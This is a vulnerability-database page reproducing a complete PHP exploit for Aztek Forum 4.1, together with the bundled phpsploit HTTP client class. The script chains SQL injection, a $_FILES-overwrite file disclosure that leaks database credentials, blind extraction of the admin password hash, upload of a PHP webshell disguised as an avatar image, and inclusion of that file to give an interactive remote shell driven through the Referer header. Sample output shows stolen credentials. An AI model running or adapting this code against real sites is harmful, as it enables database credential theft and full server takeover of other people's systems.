Vulners
Lucene search
Aztek Forum 4.1 Multiple Vulnerabilities Exploit
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
/*
 header>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit
 header> ==================================================
 sploit> Owner -> root
 status> Trying to register a new user
 sploit> Login/Password -> phpsploit8435
 status> Trying to get database informations
 sploit> Full Path Disclosure -> /home/www/aztekforum/forum/load.php
 sploit> Done (./avatar/phpsploit8435.jpg)
 sploit> $dbhost -> localhost
 sploit> $usebdd -> aztek
 sploit> $user -> root
 sploit> $password -> toor
 sploit> $salt -> atk
 status> Trying to get the administrator login/passwd
 sploit> Username length 7
 sploit> Username -> darkfig
 sploit> Password length 13
 sploit> Password -> atovlv6iH1rUo
 sploit> Salt -> atk (Standard DES hash)
 sploit> Enter the decrypted password to continue: hello
 status> Uploading a malicious picture
 status> Trying to get logged in
 sploit> Done
 status> Creating a hidden forum
 sploit> Done
 status> Trying to include the picture
 $shell> whoami
 DarkFig
 $shell> exit
*/
if($argc < 2)
{
print \"\\n---------------------------------------------------------\";
print \"\\nAffected.scr..: Aztek Forum V4.1\";
print \"\\nPoc.ID........: 21070125\";
print \"\\nType..........: Multiple vulnerability\";
print \"\\nConditions....: None =)\";
print \"\\nRisk.level....: High\";
print \"\\nSrc.download..: www.forum-aztek.com\";
print \"\\nPoc.link......: acid-root.new.fr/poc/21070125.txt\";
print \"\\nCredits.......: DarkFig\";
print \"\\n---------------------------------------------------------\";
print \"\\nUsage.........: php xpl.php <url> <proxyoptions>\";
print \"\\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>\";
print \"\\nExample.......: php xpl.php http://victim.com/\";
print \"\\n---------------------------------------------------------\";
exit(1);
}
/*
 ---[ CODE ./common/config.php
 -----------------------------
 @extract($_POST); // Variables en POST
 @extract($_GET); // Variables en GET
 @extract($_COOKIE); // Variable des cookies
 @extract($_SERVER); // Variable Server
 -----------------------------
 |
 +-> All variables initialized before the inclusion can be overwritten.
 
 ---[ CODE ./common/safety.php
 -----------------------------
 $BANNED_STRING[] = \"%22\";
 $BANNED_STRING[] = \"%23\";
 $BANNED_STRING[] = \"%47\";
 ...
 foreach($_GET as $key=>$value) ...
 $_POST[$key] = str_replace($BANNED_STRING[$i], \"\", $_POST[$key]);
 $$key = $_POST[$key];
 ...
 foreach($_POST as $key=>$value) ...
 $_GET[$key] = str_replace($BANNED_STRING[$i], \"\", $_GET[$key]);
 $$key = $_GET[$key];
 -----------------------------
 |
 +-> Filter can be bypassed with extract($_COOKIE)
 
 
 ---[ CODE ./forum/load.php
 --------------------------
 if(!empty($fid)) $FORUM=$fid;
 ...
 $sql=dbquery(\"SELECT * FROM atk_forums WHERE id=$FORUM\",33,29);
 $PF=mysql_fetch_array($sql);
 --------------------------
 |
 +-> Blind SQL Injection without quote
  
 ---[ CODE ./index/main.php
 --------------------------
 if($PF[\"top_url\"]) @include($PF[\"top_url\"]);
 --------------------------
 |
 +-> Remote File Inclusion (admin rights needed in order to insert \"top_url\" in \"atk_forums\")
 
 
 ---[ CODE ./index/common_actions.php
 ------------------------------------
 $file = $_FILES[\'upload\'][\'tmp_name\']; ...
 if(@copy($file,$path_file)) $avatar=$path_file;
 ------------------------------------
 |
 +-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
 
 */
$url=$argv[1];$prs=$argv[2];
$pra=$argv[3];
$xpl = new phpsploit();
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);
print \"\\nheader>  Aztek Forum 4.1 Multiple Vulnerabilities Exploit\";
print \"\\nheader> ==================================================\";
if(preg_match(\"#href=\'\\./index\\.php\\?owner=(\\S*)\'#i\",$xpl->getcontent($xpl->get($url.\'forum.php?fid=-1%20or%201=1\')),$matches)) print \"\\nsploit> Owner -> \".$matches[1];
else die(\"\\nsploit> Exploit failed\");
$owner = $matches[1];
print \"\\nstatus> Trying to register a new user\";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$name = \"phpsploit\".rand();
$xpl->post($url.\"index.php?owner=$owner&action=subscribe\",\"login=$name&passwd=$name&passwd2=$name&email=$name%40hotmail.coum&show_email=on&cookie=on\");
print \"\\nsploit> Login/Password -> $name\";
print \"\\nstatus> Trying to get database informations\";
$xpl->get($url.\"forum.php?fid=XD\");
if(preg_match(\"#file (.*) in function#i\",$xpl->getcontent(),$matches)) print \"\\nsploit> Full Path Disclosure -> \".$matches[1];
else print(\"\\nsploit> Failed\");
$wanted = str_replace(\"forum/load.php\",\"common/bddconf.php\",$matches[1]);
if(!empty($wanted)){
$xpl->get($url.\"index.php?owner=$owner&action=profile&_SERVER[email]=$name%40hotmail.coum&_FILES[upload][tmp_name]=$wanted&_FILES[upload][name]=0123456789&_FILES[upload][type]=jpg\");
$xpl->get($url.\"index.php?owner=$owner&choix=3\");
if(preg_match(\"#<IMG src=\'(.*)\' width=\'([0-9]*)\' height=\'([0-9]*)\'>#i\",$xpl->getcontent(),$matches)) print \"\\nsploit> Done (\".$matches[1].\")\";
else print(\"\\nsploit> Failed\");
$avatarur = $matches[1];
if(!empty($matches[1])){
$xpl->get($url.str_replace(\"./\",\"/\",$matches[1]));
preg_match_all(\"#(.*)=\'(.*)\';#\",$xpl->getcontent(),$vars);
for($z=0;$z<=4;$z++){
print \"\\nsploit> \".strtolower($vars[1][$z]).\" -> \".$vars[2][$z];
}}}
print \"\\nstatus> Trying to get the administrator login/passwd\";
$headers = array(\"Username\",\"Password\");
$fields  = array(\"login\",\"passwd\");
$value=$length=array();
for($a=0;$a<2;$a++){
print \"\\nsploit> \".$headers[$a].\" length \";
for($b=1;$b<3;$b++){
for($c=48;$c<=57;$c++){
$xpl->addcookie(\"fid\",\"-1%20OR%20SUBSTR(LENGTH((SELECT%20\".$fields[$a].\"%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201)),$b,1)=CHAR($c)\");
if(!preg_match(\"#<TITLE></TITLE>#i\",$xpl->getcontent($xpl->get($url.\"forum.php\")))) {
   $length[$a] .= chr($c);
   print chr($c);
   break;
}}}
print \"\\nsploit> \".$headers[$a].\" -> \";
for($d=1;$d<=$length[$a];$d++){
for($e=0;$e<=128;$e++){
$xpl->addcookie(\"fid\",\"-1%20OR%20HEX(SUBSTR((SELECT%20\".$fields[$a].\"%20FROM%20atk_users%20WHERE%20(admin)%20LIMIT%201),$d,1))=HEX(CHAR($e))\");
if(!preg_match(\"#<TITLE></TITLE>#i\",$xpl->getcontent($xpl->get($url.\"forum.php\")))) {
   $value[$a] .= chr($e);
   print chr($e);
   break;
}}}}
$salt = !empty($vars[2][4]) ? $vars[2][4] : \'atk\'; # Always the same salt ...
print \"\\nsploit> Salt -> $salt (Standard DES hash)\";
print \"\\nsploit> Enter the decrypted password to continue: \";
$password = trim(fgets(STDIN));
$xpl->addcookie(\"fid\",\"-1 or 1=1\");
$xpl->cookiejar(1);
print \"status> Uploading a malicious picture\";
$formdata = array(frmdt_url => $url.\"?owner=$owner&action=profile\",
                  \"email\"   => \"[email protected]\",
                  \"url\"     => \"http://\",
                  \"upload\"  => array(frmdt_type     => \"image/jpg\",
                                     frmdt_filename => \"hello.jpg\",
                                     frmdt_content  => \"<?php print 337666733;@extract(\\$_SERVER);@system(\\$HTTP_REFERER);print 337666733;exit(0); ?>\"),
                  \"avatar\"  => \"./avatar/welcome.jpg\");
$xpl->formdata($formdata);
print \"\\nstatus> Trying to get logged in\";
$xpl->post($url.\'myadmin.php?action=login\',\'login=\'.$value[0].\'&passwd=\'.$password);
if(preg_match(\"#ATK_ADMIN#i\",$xpl->showcookie())) print \"\\nsploit> Done\";
else die(\"\\nsploit> Exploit failed\");
print \"\\nstatus> Creating a hidden forum\";
$xpl->get($url.\'myadmin.php?choix=2\');
if(!preg_match(\"#<option value=\'(\\S+)\'#\",$xpl->getcontent(),$styles)) $styles[1] = \"xml_BlueLight\";
$xpl->post($url.\'myadmin.php?action=create\',\"title=$name&filename=$name&passwd=&style=\".$styles[1].\"&structure=1&subject=\");
$xpl->get($url.\'myadmin.php?choix=1\');
if(!preg_match_all(\"#action=hide_forum&id=([0-9]+)#\",$xpl->getcontent(),$fid)) die(\"\\nsploit> Can\'t retrieve the forum id\");
$forumid = $fid[1][(count($fid[1])-1)];
$xpl->get($url.\"myadmin.php?choix=1&action=hide_forum&id=$forumid\");
print \"\\nsploit> Done\\nstatus> Trying to include the picture\\n\\$shell> \";
if(empty($avatarur)) $avatarur=\"./avatar/$name.jpg\"; 
$xpl->post($url.\"myadmin.php?action=rec_perso&id=$forumid&choix=3\",\"PARAM%5Btop_url%5D=$avatarur\");
$xpl->reset();
while(!preg_match(\"#^(quit|exit)$#\",($cmd = trim(fgets(STDIN)))))
{
    $xpl->addheader(\"Referer\",$cmd);
    $xpl->get($url.$name.\'.php\');
    $data = explode(\"337666733\",$xpl->getcontent());
    print $data[1].\"\\n\\$shell> \";
}
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 5 (remove \"private\", \"public\" if you have PHP 4)
 * VERSION:        1.2
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        [email protected] (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */
class phpsploit {
/**
 * This function is called by the get()/post() functions.
 * You don\'t have to call it, this is the main function.
 *
 * @return $server_response
 */
private function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
else $socket = fsockopen($this->host,$this->port);
if(!$socket) die(\"Error: The host doesn\'t exist\");
if($this->method===\"get\") $this->packet = \"GET \".$this->url.\" HTTP/1.1\\r\\n\";
elseif($this->method===\"post\" or $this->method===\"formdata\") $this->packet = \"POST \".$this->url. \" HTTP/1.1\\r\\n\";
else die(\"Error: Invalid method\");
if(!empty($this->proxyuser)) $this->packet .= \"Proxy-Authorization: Basic \".base64_encode($this->proxyuser.\":\".$this->proxypass).\"\\r\\n\";
$this->packet .= \"Host: \".$this->host.\"\\r\\n\";
if(!empty($this->agent))  $this->packet .= \"User-Agent: \".$this->agent.\"\\r\\n\";
if(!empty($this->header)) $this->packet .= $this->header.\"\\r\\n\";
if(!empty($this->cookie)) $this->packet .= \"Cookie: \".$this->cookie.\"\\r\\n\";
$this->packet .= \"Connection: Close\\r\\n\";
if($this->method===\"post\")
{
$this->packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";
$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";
$this->packet .= $this->data.\"\\r\\n\";
}
elseif($this->method===\"formdata\")
{
$this->packet .= \"Content-Type: multipart/form-data; boundary=---------------------------\".$this->boundary.\"\\r\\n\";
$this->packet .= \"Content-Length: \".strlen($this->data).\"\\r\\n\\r\\n\";
$this->packet .= $this->data;
}
$this->packet .= \"\\r\\n\";
$this->recv = \'\';
fputs($socket,$this->packet);
while(!feof($socket)) $this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
if($this->allowredirection) return $this->allowredirection($this->recv);
else return $this->recv;
}
/**
 * This function allows you to add several cookie in the
 * request. Several methods are supported:
 * 
 * $this->addcookie(\"name\",\"value\");
 * or
 * $this->addcookie(\"name=newvalue\");
 * or
 * $this->addcookie(\"othername=overvalue; xx=zz; y=u\");
 * 
 * @param string $cookiename
 * @param string $cookievalue
 * 
 */
public function addcookie($cookn,$cookv=\'\')
{
// $this->addcookie(\"name\",\"value\"); work avec replace
if(!empty($cookv))
{
if($cookv === \"deleted\") $cookv=\'\'; // cookiejar(1) && Set-Cookie: name=delete
if(!empty($this->cookie))
{
    if(preg_match(\"/$cookn=/\",$this->cookie))
    {
     $this->cookie = preg_replace(\"/$cookn=(\\S*);/\",\"$cookn=$cookv;\",$this->cookie);
    }
    else
    {
     $this->cookie .= \" \".$cookn.\"=\".$cookv.\";\"; // \" \".
    }
}
else
{
$this->cookie = $cookn.\"=\".$cookv.\";\";
}
}
// $this->addcookie(\"name=value; othername=othervalue\");
else
{
      if(!empty($this->cookie))
      {
       $cookn = preg_replace(\"/(.*);$/\",\"$1\",$cookn);
       $cookarr = explode(\";\",str_replace(\" \", \"\",$cookn));
       for($i=0;$i<count($cookarr);$i++)
       {
       preg_match(\"/(\\S*)=(\\S*)/\",$cookarr[$i],$matches);
       $cookn = $matches[1];
       $cookv = $matches[2];
       $this->addcookie($cookn,$cookv);
       }
      }
 else
 {
  $cookn = ((substr($cookn,(strlen($cookn)-1),1))===\";\") ? $cookn : $cookn.\";\";
  $this->cookie = $cookn;
 }
}
}
/**
 * This function allows you to add several headers in the
 * request. Several methods are supported:
 *
 * $this->addheader(\"headername\",\"headervalue\");
 * or
 * $this->addheader(\"headername: headervalue\");
 *
 * @param string $headername
 * @param string $headervalue
 */
public function addheader($headern,$headervalue=\'\')
{
// $this->addheader(\"name\",\"value\");
if(!empty($headervalue))
{
if(!empty($this->header))
{
if(preg_match(\"/$headern:/\",$this->header))
{
$this->header = preg_replace(\"/$headern: (\\S*)/\",\"$headern: $headervalue\",$this->header);
}
else
{
$this->header .= \"\\r\\n\".$headern.\": \".$headervalue;
}
}
else
{
$this->header=$headern.\": \".$headervalue;
}
}
// $this->addheader(\"name: value\");
else 
{
if(!empty($this->header))
{
$headarr = explode(\": \",$headern);
$headern = $headarr[0];
$headerv = $headarr[1];
$this->addheader($headern,$headerv);
}
else
{
$this->header=$headern;
}
}
}
/**
 * This function allows you to use an http proxy server.
 * Several methods are supported:
 * 
 * $this->proxy(\"proxyip\",\"8118\");
 * or
 * $this->proxy(\"proxyip:8118\")
 *
 * @param string $proxyhost
 * @param integer $proxyport
 */
public function proxy($proxy,$proxyp=\'\')
{
// $this->proxy(\"localhost:8118\");
if(empty($proxyp))
{
preg_match(\"/^(\\S*):(\\d+)$/\",$proxy,$proxarr);
$proxh = $proxarr[1];
$proxp = $proxarr[2];
$this->proxyhost=$proxh;
$this->proxyport=$proxp;
}
// $this->proxy(\"localhost\",8118);
else 
{
$this->proxyhost=$proxy;
$this->proxyport=intval($proxyp);
}
if($this->proxyport > 65535) die(\"Error: Invalid port number\");
}
/**
 * This function allows you to use an http proxy server
 * which requires a basic authentification. Several
 * methods are supported:
 * 
 * $this->proxyauth(\"darkfig\",\"dapasswd\");
 * or
 * $this->proxyauth(\"darkfig:dapasswd\");
 *
 * @param string $proxyuser
 * @param string $proxypass
 */
public function proxyauth($proxyauth,$proxypasse=\'\')
{
// $this->proxyauth(\"darkfig:password\");
if(empty($proxypasse))
{
preg_match(\"/^(.*):(.*)$/\",$proxyauth,$proxautharr);
$proxu = $proxautharr[1];
$proxp = $proxautharr[2];
$this->proxyuser=$proxu;
$this->proxypass=$proxp;
}
// $this->proxyauth(\"darkfig\",\"password\");
else
{
$this->proxyuser=$proxyauth;
$this->proxypass=$proxypasse;
}
}
/**
 * This function allows you to set the \"User-Agent\" header.
 * Several methods are possible to do that:
 * 
 * $this->agent(\"Mozilla Firefox\");
 * or
 * $this->addheader(\"User-Agent: Mozilla Firefox\");
 * or
 * $this->addheader(\"User-Agent\",\"Mozilla Firefox\");
 * 
 * @param string $useragent
 */
public function agent($useragent)
{
$this->agent=$useragent;
}
/**
 * This function returns the header which will be
 * in the next request.
 * 
 * $this->showheader();
 *
 * @return $header
 */
public function showheader()
{
return $this->header;
}
/**
 * This function returns the cookie which will be
 * in the next request.
 * 
 * $this->showcookie();
 *
 * @return $storedcookies
 */
public function showcookie()
{
return $this->cookie;
}
/**
 * This function returns the last formed
 * http request (the http packet).
 * 
 * $this->showlastrequest();
 * 
 * @return $last_http_request
 */
public function showlastrequest()
{
return $this->packet;
}
/**
 * This function sends the formed http packet with the
 * GET method. You can precise the port of the host.
 * 
 * $this->get(\"http://localhost\");
 * $this->get(\"http://localhost:888/xd/tst.php\");
 * 
 * @param string $urlwithpath
 * @return $server_response
 */
public function get($url)
{
$this->target($url);
$this->method=\"get\";
return $this->sock();
}
/**
 * This function sends the formed http packet with the
 * POST method. You can precise the port of the host.
 * 
 * $this->post(\"http://localhost/index.php\",\"admin=1&user=dark\");
 *
 * @param string $urlwithpath
 * @param string $postdata
 * @return $server_response
 */
public function post($url,$data)
{
$this->target($url);
$this->method=\"post\";
$this->data=$data;
return $this->sock();
}
/**
 * This function sends the formed http packet with the
 * POST method using the multipart/form-data enctype. 
 * 
 * $array = array(
 *          frmdt_url      => \"http://localhost/upload.php\",
 *          frmdt_boundary => \"123456\",                    # Optional
 *                 \"email\" => \"[email protected]\",
 *               \"varname\" => array(
 *                            frmdt_type => \"image/gif\",   # Optional
 *                       frmdt_transfert => \"binary\",      # Optional
 *                        frmdt_filename => \"hello.php\",
 *                         frmdt_content => \"<?php echo \':)\'; ?>\"));
 * $this->formdata($array);
 *
 * @param array $array
 * @return $server_response
 */
public function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method=\"formdata\";
$this->data=\'\';
if(!isset($array[frmdt_boundary])) $this->boundary=\"phpsploit\";
else $this->boundary=$array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match(\"#^frmdt_(boundary|url)#\",$key))
{
$this->data .= \"-----------------------------\".$this->boundary.\"\\r\\n\";
$this->data .= \"Content-Disposition: form-data; name=\\\"\".$key.\"\\\";\";
if(!is_array($value))
{
$this->data .= \"\\r\\n\\r\\n\".$value.\"\\r\\n\";
}
else
{
$this->data .= \" filename=\\\"\".$array[$key][frmdt_filename].\"\\\";\\r\\n\";
if(isset($array[$key][frmdt_type])) $this->data .= \"Content-Type: \".$array[$key][frmdt_type].\"\\r\\n\";
if(isset($array[$key][frmdt_transfert])) $this->data .= \"Content-Transfer-Encoding: \".$array[$key][frmdt_transfert].\"\\r\\n\";
$this->data .= \"\\r\\n\".$array[$key][frmdt_content].\"\\r\\n\";
}
}
}
$this->data .= \"-----------------------------\".$this->boundary.\"--\\r\\n\";
return $this->sock();
}
/**
 * This function returns the content of the server response
 * without the headers.
 * 
 * $this->getcontent($this->get(\"http://localhost/\"));
 * or
 * $this->getcontent();
 *
 * @param string $server_response
 * @return $onlythecontent
 */
public function getcontent($code=\'\')
{
if(empty($code)) $code = $this->recv;
$content = explode(\"\\n\",$code);
$onlycode = \'\';
for($i=1;$i<count($content);$i++)
{
if(!preg_match(\"/^(\\S*):/\",$content[$i])) $ok = 1;
if($ok) $onlycode .= $content[$i].\"\\n\";
}
return $onlycode;
}
/**
 * This function returns the headers of the server response
 * without the content.
 * 
 * $this->getheader($this->post(\"http://localhost/x.php\",\"x=1&z=2\"));
 * or
 * $this->getheader();
 *
 * @param string $server_response
 * @return $onlytheheaders
 */
public function getheader($code=\'\')
{
if(empty($code)) $code = $this->recv;
$header = explode(\"\\n\",$code);
$onlyheader = $header[0].\"\\n\";
for($i=1;$i<count($header);$i++)
{
if(!preg_match(\"/^(\\S*):/\",$header[$i])) break;
$onlyheader .= $header[$i].\"\\n\";
}
return $onlyheader;
}
/**
 * This function is called by the cookiejar() function.
 * It adds the value of the \"Set-Cookie\" header in the \"Cookie\"
 * header for the next request. You don\'t have to call it.
 * 
 * @param string $server_response
 */
private function getcookie($code)
{
$carr = explode(\"\\n\",str_replace(\"\\r\\n\",\"\\n\",$code));
for($z=0;$z<count($carr);$z++)
{
if(preg_match(\"/set-cookie: (.*)/i\",$carr[$z],$cookarr))
{
$cookie[] = preg_replace(\"/expires=(.*)(GMT||UTC)(\\S*)$/i\",\"\",preg_replace(\"/path=(.*)/i\",\"\",$cookarr[1]));
}
}
for($i=0;$i<count($cookie);$i++)
{
preg_match(\"/(\\S*)=(\\S*)(|;)/\",$cookie[$i],$matches);
             $cookn = $matches[1];
             $cookv = $matches[2];
             $this->addcookie($cookn,$cookv);
}
    }
/**
 * This function is called by the get()/post() functions.
 * You don\'t have to call it.
 *
 * @param string $urltarg
 */
private function target($urltarg)
{
if(!preg_match(\"/^http:\\/\\/(.*)\\//\",$urltarg)) $urltarg .= \"/\";
$this->url=$urltarg;
$array = explode(\"/\",str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg)));
$this->host=$array[0];
preg_match(\"/:(\\d+)\\//\",$urltarg,$matches);
$this->port=empty($matches[1]) ? 80 : $matches[1];
$temp = str_replace(\"http://\",\"\",preg_replace(\"/:(\\d+)/\",\"\",$urltarg));
preg_match(\"/\\/(.*)\\//\",$temp,$matches);
$this->path=str_replace(\"//\",\"/\",\"/\".$matches[1].\"/\");
if($this->port > 65535) die(\"Error: Invalid port number\");
}
/**
 * If you call this function, the script will
 * extract all \"Set-Cookie\" headers values
 * and it will automatically add them into the \"Cookie\" header
 * for all next requests.
 *
 * $this->cookiejar(1); // enabled
 * $this->cookiejar(0); // disabled
 * 
 */
public function cookiejar($code)
{
if($code===0) $this->cookiejar=\'\';
if($code===1) $this->cookiejar=1;
else
{
$this->getcookie($code);
}
}
/**
 * If you call this function, the script will
 * follow all redirections sent by the server.
 * 
 * $this->allowredirection(1); // enabled
 * $this->allowredirection(0); // disabled
 * 
 * @return $this->get($locationresponse)
 */
public function allowredirection($code)
{
if($code===0) $this->allowredirection=\'\';
if($code===1) $this->allowredirection=1;
else
{
if(preg_match(\"/(location|content-location|uri): (.*)/i\",$code,$codearr))
{
$location = str_replace(chr(13),\'\',$codearr[2]);
if(!eregi(\"://\",$location))
{
return $this->get(\"http://\".$this->host.$this->path.$location);
}
else
{
return $this->get($location);
}
}
else
{
return $code;
}
}
}
/**
 * This function allows you to reset some parameters:
 * 
 * $this->reset(header); // headers cleaned
 * $this->reset(cookie); // cookies cleaned
 * $this->reset();       // clean all parameters
 *
 * @param string $func
 */
public function reset($func=\'\')
{
switch($func)
{
case \"header\":
$this->header=\'\';
break;
case \"cookie\":
$this->cookie=\'\';
break;
default:
        $this->cookiejar=\'\';
        $this->header=\'\';
        $this->cookie=\'\';
        $this->allowredirection=\'\'; 
        $this->agent=\'\';
        break;
}
}
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1